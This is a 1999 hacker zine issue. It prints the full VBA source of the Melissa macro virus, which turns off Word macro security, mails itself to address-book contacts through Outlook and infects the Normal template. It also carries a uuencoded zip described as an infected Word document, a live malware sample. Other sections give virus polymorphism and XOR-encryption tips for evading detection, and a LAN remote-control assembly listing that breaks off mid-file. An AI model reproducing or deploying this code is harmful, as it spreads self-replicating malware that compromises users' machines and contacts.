BadByte H/P/V Zine - Issue #2 - December 1999 INDEX: 0.....You are here. 1.....The Melissa e-mail/macro virus + source code. 2.....Why use polymorphism in your virus? 3.....A basic guide to EXclusive OR encryption. 4.....Simple remote administration program for a NetBios LAN. 5.....The Ph33r virus from VLAD. 6.....Join the BadSector Hacking Alliance. BadByte staph: ~~~~~~~ ~~~~~~ Th0r.........Editor..Virii....Programming..Research SKR33M.......Writer..Hacking..Programming..IRC BlazinWeed...Writer..Hacking..Programming..UNIX Shadey.......Writer..Virii....Programming.. [---------------------------------] 1. The Melissa e-mail/macro virus + source code. ~~ ~~~ ~~~~~~~ ~~~~~~~~~~~~ ~~~~~ ~ ~~~~~~ ~~~~~ Note: Turn of the WordWrap option to stop any errors when copying the source code. [Melissa source code begin] Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security","Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub [Melissa source code end.] ***** AND NOW THE ALREADY INFECTED WORD DOCUMENT (UUEncoded & Zipped) ***** begin 666 melissa_infected_document.zip M4$L#!!0``@`(`$`U>B;LHAXEW"X```"@```(````;&ES="YD;V/LG7MT'-5] MQ^_J9=EX;&&P;,#&8V/`$.NQ;TE`D+",;)"QL&4[8#`6:D#0)(;0'*.]W1W?4+SQ_[VK[[3_PE*TN?9=7L\/A< M5E=R+`2:_)T&QEK$LU MGO+]WOG3]_L;`(+''A;YD9Y[>7W4C[=+^N,G_WQY^8^:_/K\]@\+>>H\:]Z& MJX8?#I7+VXUSL%T]\WU_,FE;7W=7__IN>5/7EG4;Y$A"7KE2DKJZM_7VK]NP M?MV%>[\ADE=98.)+HE*5X:34I6U/N`@EZ5$8,B40B;KIC5#\P8MG3.LC&YZ?>_M2.<=Q8S+?1UIW=5' M-3S-9'`$;#-G%4Q709&2&T!))ZL,FRCHY5);:3%'&]$-H^"XMH+^\8)AQ[VB MH-BN9OMU\/%#13G%U*UTIVZ:5EHS7;H:U;I.0L\GVEU9:B^MV=940\<-!3IC M="BI-&Z??DOAUM+K!VQ-4W(.FE61:2-EY08L.X6"*>0H&3[:)]?;$49";WDF MA2.E%>BN54AGWHFJZHZ`3.2VCT--%/='F#5X]HD@S M?WY.D]F4LU3-<)I-S6WADD#2@Y-T$WE]!$4#TJ?J([J65G*!YM'KW4I.<]!M M+Y?"\6"_'4B;4?:X=RN#&B\Q2!T,B!CN'2.+AZUIKI!,?0@/O@5'6R.^I*G* M:$ZG<4,M6X)"GX3EMHFG='D0A-$I%)N1I8G"57+Y0HEATMWHN9:%(QC(&8$=:RX3; M'9KI@?9V7*`X6DXW:;#Z+6LK=0DU!$3+R17DI`=ADOHZ=-/15'E%SP2;1G[9 MY//"C61MW7&M?!82D@_L29%$^=-#C<6F/`RZQ0>$BELJC0+/I$ARB@,I,P/! M.[;?/#XAA0)6+`AC%]! M,0+/(*^GW8*ME77%M:`MBDF6C?0+O@ZZ&BV7Q9&1)A7ZILTLD1DDDF7*I&A0 M$O7146.ZHHXH:\,M1DGA%-O&:$8#P@A_E"(+2<^^M`ZAK<.D/'T=>4@$2D;+ M'UQ.H7L>QG,W?;6S#!6:Z!1)?!RH(X8_&BN[7XR=5L#SMG4ET&_%3FFL7:]0-+*V_I84"XC9D&(4-'^(_9T)VZ%,!C.: M:>M7%,CR^EM2+'I4?8$VC:`XSZ180/1P"'*BN+KEB6LZHSQP+"-HBG3[&8Q2M0X#X@_Z.: M2E(#7X5B]%N*!:3,LU!-L+@P+:42WJ*9&2JIVVEK$&6+5L%02$^D6-LLM2U@ M8#`,4".*!;T-*3;5QWY8`$/A!H5OZ33ZBR@,.`PF%>2;%DT<.(D=*]`L*%@]*&[E#0S%5 M7[T0/Z;1K-JB:@.X1S,#BX6H=_H6\8VD78I%86QLW MF$7O"7JYE)B0N&D=0A,/;@)CCPC,(8_,K59Z`[=VY02 M`>GSIAP&8L.,;AM30SR<-WEYPW*A*HEHF8FBF4EQ:M]IBF1H(QA<[@TGMZ5$ M0.Q&=53+BSNFHAL(3+A_:6V-)=H2I&/^EI2(EZMXP1Q0=#<[4#"$6TAC8%`D MA3Y15Q-!QPLWS^?792+BDM?O\S(ID9QB1]3)<<%DT2Y.*(.(&S"34T@<$P'9 M"K<%XBU/L*@"S?:GH7G%<88M6^4:)3:E1$"JAK44HC?8>C$!QV63)G!$B(._ M)25;IQKCE#5B#0SHZ:!6EUHF!)9*(I$0C@!RE0P8-/[B0BV6#1K,A*:B8:_Y M'"PVRD6"Y:`JUH"CF],[/DPA+9K-JWR*CM+1([=*.8KP3$K&@D$NNJ-YIB=# M4T'Z-:P4A>G+Z:GV-C([/)>2$[*44A``YO->2]#@#!R$-I+54SKY74P#2))3 M"(I5_KK$WY*2B?*HKDSSN?IE%=/DY?PM*5EBM##."IJ&X?">#FIP)N(BQ,Y+:J5;LD6'!?6*QA&9#`)3V?SW)]ZV[+4 MUOHQWJ%)K)(^S:F&L<5@Y5+O[SV'/J@,R:<_59]W9@C4L6IZ_L<+&>@&-M@+ M]H&?@89:QK:".\'+8%$=8QO!WX*7P/PYC&T"7P,O@-IZQA)@##P"?@M.G!>TS&=,!_O`NV`M?%`6W`5^!%8N8*P?W`I>`\L6,K8+W`&>`PL;&-L.;@$O M@IIC&5L';@!/@6,7,78!N`H\!>J.PSZX!CP"0LE% MY5'\<3S_4]BB5K:L+\16W/="BWS?:^>LO*]^SBIPRIZ]M:O!J?=5PJ5/<5K$ M%K)Y$(6=R*O$L=6,=;X[7L57(]6QBYC%;)9C"C.8MZ*IAN4V\!5C9>ELUM7Y MV_%]R!EK9-U,8P,H54`YE\FL#]LVR/#?>9;%L?-1MXFSY8E6DM7PCM3R%86\ M57E\7"RUD;TC7GIQ/A,KSZ)"J"=7KTEBF[P<63IO19NWQ.W8DNO\]6>O@)_2 MBC2Z!H\`UX`AT`U0JX: M,`_\&;@.7`]N!H^![X.GP'/@/?`!.$AA&OIX.F@"S2`&LL`!+OA3\(_@0?!M M\!#X%7@+O`U^0]$=(K=E8#DX!?2!2\%.H(&;P1TBRML+G@8O@1^"GX+%B/26 M@>5@%=@,=H#/@!3\`KX`%D)M&L`2L`%>#&\"7P2W@&?`R M>`7\'$B(F(X#QX,3P;7@JV`/N`T\"IX$!\"SX`-0!?FM!A)8!RZ<[ZT1ZP=_ M#JX'-X";P-/@>?`^^``!?P;[P:/@`/@`U$`!:L%" M!#<``#G#!E>!;X'O@(7``O`\.@D.@!DJ3`)V@"VP`@Z``AL`8^";X M-O@.>`B\"7X'W@.TZ/-2*.+E0`%9\%7P-7`KN`L<`,^!Y\&/0#V4=A$X#BP' MYX/-H`]<`NX`>\'CX#GP//@QJ$,T(X$%H!%T@$[0!7K`M\!WP??`$^!M\#OP M'C@$3D/TTP2:01QD@`7R8`0\!UX%/P&O@Q,H,@*KP1RVK$*%64")O!,$B#T+ M7A91&GFB=6`C^)+P1$\*3T0NL0[>I5UXH&O`]>!)X8$."\]S+N@&8\+S_(OP M..\+3[-&>!A=>)9O"H_RAO`DC<*#7"P\QRW"8SPC/$6C\!!]PC/<(CS"#X4G M:!`>8(NP_'\E+/ZOA*5?0>\)P$YAX?]"6/9?"(O>*"SY#F'!;Q26^PEAL1<* M2]T-+@#7"$O]K+#0"X1E[@5;P'7",C\F+/)!88F[A07^HK"\CX&GP.^%Q8T( M2SLJ+.UWA84]*"SKV<*BYH0E?4!8T-\+RYD4%M,0EO)>82'?$I;Q5%BY)K!3 M6,8]PB)^7UC"N<("]@C+MP?<#IX0%F^.L'1G"0M7`%>"!X2%^T]AV4X7%BTK M+-E=8!]H@,5:.F&Y3JSPL1D?I\_0',,N0*R;1;0KLPW8,A!1:\QA)[!UK(/M M8CO81D3:W6PSMK9BOYN?'41L;"%6WH7HN94U,Q5[Z1GK6C'+NGJ9CGT7-;:Q M,&N?J+<:M>FHZZ19UF.(>OSRXYVAL1"/K8F7=ZML5VA7J$'$U@M$7M50$N1W MPJ?3+U@@UM.X!\:LJJJNNK:FMJJ:8N4I\U5*_;R3U!49W=/8,/(MZ`!-44R< MCZ.>*E9;&ZH*S:FKJIW#2C_6XJ4Q^K65%5$FQ0<0DX?3>.O'U-5449JQ]2Y, M7W0Q&5J%^<,5]=FI!\]W5VW?\Z#[$$\WDAK\$SJ>'^T)\?Z:!.5O2LT/KY([*_D4UH' M/\-\BJQ"#GW5DC'UI6,RY*6`*6]!'"5U6ROR=JC?$IQ7)Z;(.R#-*5RI8T\3 M4^;2^AVVF"4QS94GKB$=T+DA<&$0=+[OJ^7,1L=7]$KZ?Y\:03(J>XN+=5.F M=4VRH3MDXT_F)@XFCQ:!R=LU6Q_0TWP!I-QG6VHA[3KRFJ[M?6=`@,END5FC MO%[DI'24O]E0S_P/8\V4G]S@*2:]<^KSE]_THA\R?32CJY`I8#/ONX8FVJ5Z_L%[NN)+%H8(1J&X^<$K=S6?U'#S;?7L,VO_ZUZ:%]>6';L=$^C^D+?2@N;2>5%VA'FK M*FZG,N!QQOAW2='?M6CE!?UM:PGX-_$.X`WFO:%]AWES[O?$NPE:&DQUUX2\ M;U>)A2;GYB=_BM]?W"ZV*$=OT=_TX\_[.GP0T MSVX''>`LQOCG4LX1\^=S`:T1HIGR>6`=H/<;Z\'YH`=L!)O`!>!"T"MFU=06 M?6/PI^'[GVGAG,47'ZWGG\2Q61%W9FC-O;JI.6O.Z[EHK1P^@Q'S6/-6S509 M@>TN596[THVL-N3713)4-]=[E[3?$Z_S^>],3]FYK$PZV<*2S&#:1])?A=`>DOO9S9EZ/W2L6(YX`ZQM*J;KV`L\`52TWTB M::9T(JL*U9;(PFS+T?=F,ZYO6WFK.?[IJ")DSA1+Q^B(RW3^":F9TQJT7R5T M=[;MY_P7?+S]\CL_NOZTH?VC'?\"\SXIQ;A^*6C=1JW.K,8M'F)[SX:&KP7] MT-H%+!0*"5NT<*9"OWFHA^3._V9F$_=(DKX&TK<=VD\V@.YL""-0/AK-T'B% M[]&RO553SM?#@OKW7G^$]L>."_'V2T]M0CW>@CT'[1Q]:L"#]&WS=.._=D7/ ME#+T'G'/"4'[[]OFCVK_2:>.9/_)9BYGWCM/J#]_K[F2>>]HZ=TKJ<2IX#1P M.O/6;9T!S@2?8=[_+T#__P#9_Q9AOWW[3_X@)NQ_8I;VOU/8?[KOZ>S_!N$# M?/M/UVT2/F`S\]:/70RV,%I,3`N3&=L&MG.[PMCGP"7@4K`3[&+>]]I_'EP& M+@>*J#==\@P&R&2"+-#!;G'.$#GIG\6\=^U7`!LX7(:]\T/(AYGW#IZL^2BC M-\&,?0%<):[QTY!F.]57UXQ=NR8L-\GA^C,ZY/5SM^MV(>6,*:Z6OEKZR_JM M2Y4AK?J>_7-S>;?Z0/W8F:8J;QR0V+QN/2=O,S-,Z5:_OL'N[?EF-FUU=AO2OEY6S7WQO]A[UF@VRJNG/(DD/())H%M M"H78"VS3+0UI^EG*LKOV`EU"2T\*VUTXN^=@4FASV-VS+NTVZ2X'[YUY\_3D MQ*$$VMUS]JQT)-UWW\R=.W?NS+US9^8I#Q6/_J70V-8[F%YAM1PHL)UPQN.3 M>0'.:D%?6>C,-RQ.F^Y?;FL0)*=SF2\>Z!,FO^2\J[UIGVGO\5N.%;AJ=3@^%>\9DVM'!!T4)<+%PG:,\OM36+_3UB#%OB^_NF\N*G M2$`>W9X^!!IGK$<[4VE#%?:+W)D*8L420A(G2:B>'C\:'*? M:3F>RFVXMD0WKOH1/UD[@C=A:8U]]!#N7?Q.,6?$>\\]@74&XT\* MIO]LH@M?9T%-T;B8D`(Q@X1;QM<&^@6,ZA-B%%OPJE'/M0-_`+C^0/+@H7.]H?2#W@L'#L^>WGM&$LX\FT(7 M'DCUW?N$)>QIJMK7\2_+M]6[<,>69;9MKIG;XM&9HMA8W6E[5;S\84WK'O\1 M3>'6]X=G^..:KVI:Z_SNYAG=E&;L]J`PV2(&AR+".+)O0FTAZJ&8SAN='A?O M/)7;QGOY\^"OI+75;XP_R-Q,I#GN3,C7S.)EQD+^A>I&NJ^D:.1X@8 M!$DXI\=5%7C_K_BCM_O%IEC(T27AC0ZN:6S-UW7K'_9<%)T>.[_BX,%E8_K1 M_-GCN3^_ZT-N//^KN4\L^EKNKPJ33^96:4S&(YH_U7TMMW6W_WANZ-3A.#=Y ML&0!7NX+$D76 M>%%5V9A^PKZTH]`M_G;YK2:3L7E:%.,FX_>*OZ%-W]Q7Y3GZ*+9:WGGL[&/N M#R/I"6O9U)V;$QK^MAH MYQWY6]"1SJ?REN!C);-W%Q9PE_S:_86AG=UG^PX.5AX M8^[KYG76LR:QL$_Z\K6QPK\YKCVF%0L+L%!H+UWO*MUYSF4OLQ>4.Y/.EY#U MHZ98>\F65_=N=21QNY\RB-("__1*NMC]BMY\2@V^B=6M]_(GH9ESP?H%4HTVB"NW(33WF@@',%W_8/F^@V5#JY3OR@4EDH= M21S`,0&-]&NF-.D"3R!E;17/#3L=+>'8S'MOHM->G<_@78S9_ZEA<\,=_ M%A_U#T\_B%*5TK"(X^)H&/=7X'ADZ.Q>1R(T2?LF&([C!_J_3N:+YY;-@4TJC6!R2I$`-'CA[ MT#:V^^'%OB'4:S*:C/_3\[]N>/O`@K7#;_5G\S\X/?,3KL;_/3U/^:L_8_FD M7.-5E*]!F;W@4*KL`78#!QU@U6\&#\!-+?FG]O^O>OY!?/5!YJP&P<(G/D?[ M&3Z#_TWFNRGF?R>VIADVS3Z(>6NY#,YE,K->%CD@[RWL>%6*_4[HU5P5WFYS\_PS<_9V;F0,JI@#BC M]N/`'82-6;+'/Y>>=^6R:JB#_,5<.7AN#>!!V>F[FJZ0>S.KY>2=#;DOPV6_ M:\`[O1N\W=7@Q=KA=QU\Y--VLOXUP+<39@7DV1A-J!G*(2?OW'"G!=YMX'O. MO=,"L)OF],&G'C07`]0(-#H@A0=2R/JM_))U_6HHVP,4FJ'L;73N,40/M&%( M$:!'B_K8LSGD`TQQ>$>1T3KXK/E<,JIC,JJAU%0YD=FB_!21 M*.4S3*,'22J-<&8V*<*\E<0UVN`W1/$"I)A[U0*RZ@1A[-IT&K+Y')U4JGFDG'GI',I>*$^7?1(6)`>`A-H7@F@7L05@D=!:=&4)G9S<@`@WVXYW> MG[^QZ,D7D&/UM/[PZQ,O.GY]3KV^/)P8OB2'F0VX.6Q2J71'CC.P*S)-(8^H MF];(1]D5'@A#=P_N'228IP`^1(:12\E?RB#)2IZ:\B&2/Y$"A10A6Y-5Q7>0 M4M7_[9>5CE,^B\P9AWSF#&11N*VU*".CW%`:X[61_U;Z/Y_"&D&I7LD?396S. M/LMBK_S^CUD<9':V)ROUY?GR:+[1<3,_R^:\8VRL_OB2]+S%4JVDSZ8_>07Z M!3S.I-)2)#[2XITK)?F;XSZOW_CQ M:QQ(R[+/H/Y#),!:%C4B<"^+$!&X@D4C"$PTXP2#B1-BX&1X%;4C,DPB,76< MFB9-X+2!1I@.,3QIX7$&DTC3JYQ*?YK!14JD$6`29=HNPUH2D4K+L(&D&6

STE-!`DSX,3M1!;\*H-) M^YS/@B\RF)1KR%%E:Z:PF4;>K#DJ#]MS5#D/,)CH0SI'Y>%0%IVQ+#HGLNB\ ME47G?!8=^J7HB4[EWZQ3\]H93***#@:3=NG)RCO"8-(CTEGI3S&8C')G&4S: M\6)VN7H5-NO5ML]JY.,1'L\I%'\X>E%%#(04N`'*987PI?!#(+XJ1Y&4<(?0T\$,^>6`1,2KGK:B")_'G MR_&V*^#M=!8W@&0GZE;T@9:,IA]H,?VN8Z/\^\!%(2(!6E'<:7/&XQ&V#1IX MJ@-N;*B:5])I48NSO0D#9B5:3^_5\++$*JY*8B=!35N$2#B9#&S.;K]\!.TD M1VYIX):T)BGM)#B'C$.0F-S"!!=/B*%P1$"$7N9O&8`GEV,#K^Q:OP`4-O&_ MI;(A]TI@S"]!+OY^I-2?W"=W5L(=4B65=IG,U)^T6S"3CNCMI`;-HQ5_"(V3^Z12#K'` M[[.6)+48@,\@M%R$MG>(Z;]\/W[9_1@O\Q\#K`2?7=!""9!#*.MZ!-J2AWKO M9G@#1_27<41'K2>A=^50.B0M8NTNESF2H>9RW`6:W<_T-L3;T!X>9?J#0H_< MLX!#D[226,WNY\M':4_?1O*(Y[A M2?`)VN6_G,2^H5[L86K>[8Z(2<%:1D;+/2SW(9[0VLW/7YZ.EH=I&\Z71J5S M'[W:G>G/NWF9GQFF;^A98F'HNB5+J/A.=#V:I\C&@F^/>-Z#]C)'/H`^D)UU_!ON^DQXAZB5+#\3:XVJ[W0[#85"^6K>6E?,674,&7'0SIE8>DP73 MY&8EV9Q+2H,A=L"PZQ'ZPD&A1*&S'M%4E9LP6[;($-E0"4B5!!D@PU*IO(P! M@W2_4(+1(_P-Z`AM:0+]"4`YM*^=1+L0]@^#C)35BW!,2M+5"S`%\NH%L:25 M=/F"X4/AD)1B2:E=&$HJ"QG1%(X((+A$TH9Q0R`J`!_D_UOAJDE9R\`#8&IL M&!V#=GL,..E'$="/Z1S96R0>/H?_`CDE*+YW2$("WN;J;@U$`=B(+=`^:=)` M%I/1.&-P!9+\2%6KF#!'`Q%;T3$WV+"`%.B-<-OJ`P:P2WD/M">$X)C0%PF@ MO*8@^F>#/S%DLGA'XJ(V*11=[Q>B\0B"?N(1H+]PU]S@'DI*8C10MW$+3%$!!]Z/-9OM2!+!;808X44:X44X7BQ%P9P%ZE=<1<(<6G1(I3 MB:E7R>%F`8%/:2G#&S8A;+%@_P!P93*ZQ6@T$$-!5R"1M%I:^`!:82FSN<68 M74J(D;0AYPLVVX>V]`)O;%]RWU>TS_]R1WHCKEIE,GI'4ZG7*OPB*G^MPEO5 M^L4V1YPX?LE]:T.&<"+J6+>"QCR][$%5$GN,VGS[CJ8S4H06OH(ZQJ MZ?DQ+ZH"7Z-FSIFR=8!UT1-G5SY3=O513!*QK6=1KR3D]4,JSQ4BMFHZS,KY MM#%;#OW]%6J[^@]6VP9:6_(0KRA]FAZ)SWOGJ:$7;?^CU!"A=VU>TT/3UYH/ MVOB>!UH6?)?LY"FGJPW9<<7Y<`M^\9^UROI07B;V7PU\UD-=/50";I#%&JA3 M/95*%>"(U"KAXX$Z*2L#3GC+$JMA^.HKZ,4GK8_,MPI"?NLIWDOC_ME7+33= M.F@9=27D]ZT=7'W:+YAW]R`' M7O7FL+UXIFT8$;$=)JB4'[WDXSTFBWN9P7SIE1CK8S'*NJ MG=K#P-75^KWD-CA.WSEMAASDL';Y43/2:9-24(P(1WO,9)[AJP?_*NE>:$9Y M6O]`.*DX?1N>-*-<*'=6HT7=7O)OP&#FE[QM)O]4`#D"D7?>`OB`@2:0IX;7 M#`%%+9CL0:%/JCQI1@:M0FWP37*+>8=;)LS(Q'+.\:VGO@PD:9D3M%/;;;P>"J=H#:!CQ'@G?WP+L,"2>F/@ MY`C!?_IS%=4F&^RO@X0*,@1C(3#>\$-V[Y&[A=\UHX7L+O4U@1D)*@OW1(\9 MF17>`[L$64AP/QJ77GO1C/)9A;?&^I5M?**XLW$2^%=$$4BV!.)A\-6$_G>! M&$.[$D)@Y]8HB-CIBX"4GX)6ST/@JH$LVGJ)J"_>!QC65`V"1`C0[7SN]T`7 M&+Y9[!=CWVPV(XXA4A&SFDO>G4IJJQBXJW0HTR,7Z2MN`VA3;7*#'<3%&F#&60F9$1/J/NU4R MK?ZFJJ<[539E3:.N.#3`G<]FIW0WO[LMJXG$H"!O[7OW>K5$VM1LFU])5S:[ M[N;7+X#P%:DUM)X9487F$6"J(M!<>?M5/:&;_*!.O_QWE9)'='JL^[.O6_U+ M#P)EIN+N'<[KTEFZ2FB^\!,8)%2U(=$WN;)_[$LX57\,I[LMI'A?+K>P*&"JSE_-'0ZS=%U#0[9RWE^+!?%BW2-&A)0 M"KZGU=)'XS-US-E"%DP""VNPK["O6G M"DWI'Y40:D%([8D((='"I0(.<$`**1Q`'-HC%T0E.'!"((1:#L![.[->=QVK M3>BE&ZUF\W:]\W9GYOW,?._M\`;PG2Q1>Q%ZQ7K0#JKQW7M,L%'YI.?:&5'(BN2`6!BF]++87QZNEJIOO0(6+>T+!=ON,X)6\03-#Q4RW5+<[._/E8]O$--KX]+;Y56O M?T=)Q^I%.CO^\)5W06D/@-9^)!Q0@A=&0PM&F9Q',_>Q73TJ(3F=RHO?3UR& MSMBI"S34I3]P\>AX5&_=HM-VO68RO[-CTWZ6L]P%G0BUHR",MU"3/^K@RS87 M#2;EJD^C1S57!T,+L"_SO$:;[.,<@-91@ZI1X@:0W.1ER6=^4>+!U#P0WG$0 MHWZXW.\<9M="KC59ZK\N-.`OI?^!OVQ;!OX2X^B.AAKQG_(*XU^6BW\$LT_X/LVQNDWL['\]B)N>R'2P*_!6^-+<042AC/ M8VPK.C+%%2E%HY#/%W;R?[AX`>DRE-,&+1,$H8:[JBHH7I`?7"8"2H20R&KJ M878"_/$RG/85==O,A^8-A'Q1C]`:0H)S5JT\5RU-BJCII[U5*Y&O6O$B/X33 MU.EXH5]W7PQZ4LC1)L'CJ)4WT"Y.^Y:7!QHXDGSO"GXI/,XXXMK,56;,ZW+T M&5:-S<9(\/@"5NBV2-#Y1M5]->BT$Q@6R=0!>-V5O1*G7>+E5`-[PQ>L[&?7 MO=[2G#VN2E'_N5V"D[#V$N^56LB;Q,#M#*=?"WK@8*\'(@?^R2^D'?1Q!>]" MP$`VT*&N"JWQ8^W%3\U$RJ&E&3@7NI6!L[?$6V-E_5=OQ/[>]VC[E[^0CXCY MXR!(4$%9JC=['=A1CU:1%XZ*Q"[L-AOK2\C5^I;&1NGCM"]X.=_0*(=\O1AI M?GPETOP@4*25E[CN+]_]:NW'UQ`]_';]CLIQEBO'2!T.W2]E^0@-7W?'0@UI MSM[SU))XLN!@8DJX59\U&VR+N M2,KR6K=NS$E\:XN@&Y"-*Q$`I*1[\U&-5.SI82=E`TM MI4CU.]8PH&>C22V9ME7-T&2XUMGA3*\!]^B6DIHEJ79*-C5%MG!/FE&,.]F7 MJTS/B-;+,^`MCE9%\)4JS[9%:OS)V2-J6E7,5$**&79&@H#.SL(:^OUP0_[@647I$G%/)>4N,9%6N\05AKY0\L^_ M@0CK#?[80+764IS6\#I62!T@08DQ_[#X[A[/IXF?V8^>>$.<)!-\B?B M./_IY'M_W`0?^N-SK63+$Y_^@/;553[&#RBS"RY3%J_[.66(S`7*S$Y$ M3%*P.RK."@2;U5[NMF8%]L\A'M-ZM[;EUG^WMWNY_OIQ'SY5&7M>S%4F)D>G;Y.KB;LHAXEW"X```"@ M```(````````````(`"V@0````!L:7-T+F1O8U!+!08``````0`!`#8````" %+P`````` ` end [---------------------------------] 2. Why use polymorphism in your virus? ~~ ~~~ ~~~ ~~~~~~~~~~~~ ~~ ~~~~ ~~~~~~ Basically, a polymorphic virus "mutates" by changing the encryption value like a normal encrypting virus, but it also changes the decryptor by inserting junk instructions or changing the decryptor instructions around. There are at least 7 polymorphic routines that I can think of: 1. Many encryption methods - uses multiple, constant encryptors. 2. Difference methods - uses different registers and/or opcodes each time or swaps the decryptor instructions around. 3. Junk Instructions - inserts instructions like "mov ax,ax" which do nothing effectively. 4. One that implements 1 & 2 5. One that implements 1 & 3 6. One that implements 2 & 3 7. One that implements 1, 2 & 3 Some junk instructions: OR AL, AL MOV AX, AX SWP DX, AX (followed by the same) INC BX (followed by DEC BX) [---------------------------------] 3. A basic guide to exclusive OR encryption. ~~ ~ ~~~~~ ~~~~~ ~~ ~~~~~~~~~ ~~ ~~~~~~~~~~~ EXclusive OR (EOR, EXOR or XOR) basically takes two input bits, if both bits are the same (0 or 1), then it will return a 0 while if only 1 input is 1 and the other is 0, it will return a 1. e.g. If we imagine that Input A is the bit to encrypt and Input B is the key encryption value: Bit | Key | Output -----+-----+-------- 0 XOR 0 = 0 0 XOR 1 = 1 1 XOR 0 = 1 1 XOR 1 = 0 Now, If we swap Output with the bit that's been encrypted we get: Output | Key | Bit --------+-----+----- 0 XOR 0 = 0 1 XOR 1 = 0 1 XOR 0 = 1 0 XOR 1 = 1 Now how hard was that? This encryption method could be used to encrypt data or your virii code to stop it being disassembled, debugged or found, although this is a very crude encryption method as there are only 255 keys available to encrypt the data/virus. For better, stronger encryption, I would suggest adding multiple XOR loops and/or incrementing/decrementing instructions. [---------------------------------] 4. Simple remote administration program for a NetBios LAN. ~~ ~~~~~~ ~~~~~~ ~~~~~~~~~~~~~~ ~~~~~~~ ~~~ ~ ~~~~~~~ ~~~~ I couldn't be bothered writing much so here's what the documentation says: Workstation Remote Control Software for your NETBIOS LAN SLAVE and MASTER are a pair of programs you can use when you want to remotely control another workstation on your LAN. First, run SLAVE on the workstation you want to control. From a different workstation, run MASTER to take control of the SLAVE'd workstation. SLAVE stays in memory, ready for each session with MASTER, until you reboot that workstation. To end a MASTER/SLAVE session, press the following keys at the MASTER workstation: CTRL and the '5' key on the numeric keypad. Limitations: screen and keyboard activity are mirrored, but printer and mouse activity are not. Graphics modes are not supported; the programs work only in text mode. Also, there is no arbitration of screen attributes between monochrome and color screens -- the same attributes displayed on the SLAVE computer are displayed on the MASTER computer. [BEGIN MASTER.ASM] ;---------------------------------------------------- ; ; MASTER -- remotely control a PC across ; a Netbios LAN. (see SLAVE.ASM) ; ; Test version 0.9 ; ; (c) 1990 Barry Nance ; ;---------------------------------------------------- DOSSEG .MODEL small StdIn = 0000 StdOut = 0001 StdErr = 0002 RESET = 032h CANCEL = 035h STATUS = 0b3h STATUS_WAIT = 033h TRACE = 0f9h TRACE_WAIT = 079h UNLINK = 070h ADD_NAME = 0b0h ADD_NAME_WAIT = 030h ADD_GROUP_NAME = 0b6h ADD_GROUP_NAME_WAIT = 036h DELETE_NAME = 0b1h DELETE_NAME_WAIT = 031h CALL_CMD = 090h CALL_WAIT = 010h LISTEN = 091h LISTEN_WAIT = 011h HANG_UP = 092h HANG_UP_WAIT = 012h SEND = 094h SEND_WAIT = 014h SEND_NO_ACK = 0f1h SEND_NO_ACK_WAIT = 071h CHAIN_SEND = 097h CHAIN_SEND_WAIT = 017h CHAIN_SEND_NO_ACK = 0f2h CHAIN_SEND_NO_ACK_WAIT = 072h RECEIVE = 095h RECEIVE_WAIT = 015h RECEIVE_ANY = 096h 